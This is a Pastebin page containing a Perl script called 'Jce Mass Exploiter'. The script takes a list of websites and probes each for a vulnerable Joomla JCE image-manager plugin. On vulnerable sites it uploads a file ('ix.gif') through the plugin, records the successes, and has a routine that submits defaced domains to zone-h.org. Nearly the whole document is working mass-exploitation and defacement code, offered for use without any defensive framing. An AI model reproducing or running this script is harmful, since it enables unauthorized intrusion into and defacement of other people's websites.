Advertisement
Jemb0t_IR3eng

[PERL] Jce Mass Exploiter

Apr 19th, 2019
628
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #Jce Mass Exploiter Coded By Dr.S4mom
  4. #Uptade by v4p0r and Tr4xb0y
  5. # sh00tz > all friends
  6.  
  7. use Term::ANSIColor;
  8. use Win32::Console::ANSI;
  9. use LWP::UserAgent;
  10. use HTTP::Request;
  11. use HTTP::Request::Common qw(POST);
  12. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  13. $ua = LWP::UserAgent->new(keep_alive => 1);
  14. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
  15. $ua->timeout (10);
  16. print"\n";
  17. print colored (" --=[JCE Auto Explo!ter]",'bold blue'),"\n";
  18. print colored (" --=[Code by Dr.S4mom]",'bold red'),"\n";
  19. print colored (" --=[Update by v4p0r and Tr4xb0y]",'bold yellow'),"\n";
  20. print"\n";
  21. print colored (" [WEBSITE LIST]: ",'bold white');
  22. my $list=<STDIN>;
  23. chomp($list);
  24. open (THETARGET, "<$list") || die ">>>Can't open the Website list<<< !";
  25. @TARGETS = <THETARGET>;
  26. close THETARGET;
  27. $link=$#TARGETS + 1;
  28.  
  29. foreach $site(@TARGETS){
  30.  
  31. chomp $site;
  32. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  33. $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
  34.  
  35. print colored ("\n [EXPLOIT LOAD] $site\n",'bold yellow');sleep(1);
  36.  
  37.  
  38. $vulnurl=$site.$exploiturl;
  39. $res = $ua->get($vulnurl)->content;
  40. if ($res =~ m/No function call specified!/i){
  41.  
  42. print colored (" [UPLOAD]",'bold green'),"\n";
  43. my $res = $ua->post($vulnurl,
  44. Content_Type => 'form-data',
  45. Content => [
  46. 'upload-dir' => './../../',
  47. 'upload-overwrite' => 0,
  48. 'Filedata' => ["ix.gif"],
  49. 'action' => 'upload'
  50.  
  51. ]
  52. )->decoded_content;
  53.  
  54.  
  55. $remote = IO::Socket::INET->new(
  56. Proto=>
  57. PeerAddr=>"$site",
  58. PeerPort=>
  59. Timeout=>
  60. );
  61. $def= "$site/ix.gif";
  62. print colored (" [EXPLOIT SUCESS] $site/ix.gif\n",'bold red');sleep(1);
  63.  
  64. }else{
  65. print colored (" [EXPLOIT FAIL]",'bold blue'),"\n";sleep(1);
  66. }
  67. open(save, '>>success.txt');
  68.  
  69. print save "$site/ix.gif\n";
  70.  
  71. close(save);
  72. }
  73. sub zonpost{
  74. $req = HTTP::Request->new(GET=>$link);
  75. $useragent = LWP::UserAgent->new();
  76. $response = $useragent->request($req);
  77. $ar = $response->content;
  78. if ($ar =~ /Hacked|v4p0r/){
  79.  
  80. $dmn= $link;
  81. $def="x404.hz"; # Seu nick no zone-h
  82. $zn="http://zone-h.org/notify/single";
  83. $lwp=LWP::UserAgent->new;
  84. $res=$lwp -> post($zn,[
  85. 'defacer' => $def,
  86. 'domain1' => $dmn,
  87. 'hackmode' => '15',
  88. 'reason' => '1',
  89. 'submit' => 'Send',
  90. ]);
  91. if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
  92. print colored ("UPLOAD ZONE-H SUCESS $1",'bold green'),"\n";
  93. }
  94. else
  95. {
  96. print colored ("ZONE-H ERROR UPLOAD",'bold white'),"\n";
  97. }
  98. }else{
  99. print" Not Defaced !! \n";
  100.  
  101. }
  102. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement